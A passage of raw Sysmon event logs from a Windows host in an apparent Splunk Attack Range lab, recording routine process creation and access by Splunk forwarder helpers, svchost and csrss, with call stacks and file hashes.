C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.235{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.235{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.235{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4857-6000-5205-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.235{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4857-6000-5205-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.236{08A6967A-4857-6000-5205-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.579{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4858-6000-5405-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.579{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.579{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.579{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.579{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.579{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4858-6000-5405-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.579{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4858-6000-5405-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.580{08A6967A-4858-6000-5405-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:16.063{08A6967A-4857-6000-5305-000000009A01}8166560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.641{08A6967A-4859-6000-5505-000000009A01}31326860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.485{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4859-6000-5505-000000009A01}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.485{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.485{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.485{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.485{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.485{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4859-6000-5505-000000009A01}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.485{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4859-6000-5505-000000009A01}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:17.486{08A6967A-4859-6000-5505-000000009A01}3132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.985{08A6967A-485A-6000-5705-000000009A01}45886952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.829{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-485A-6000-5705-000000009A01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.829{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.829{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.829{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 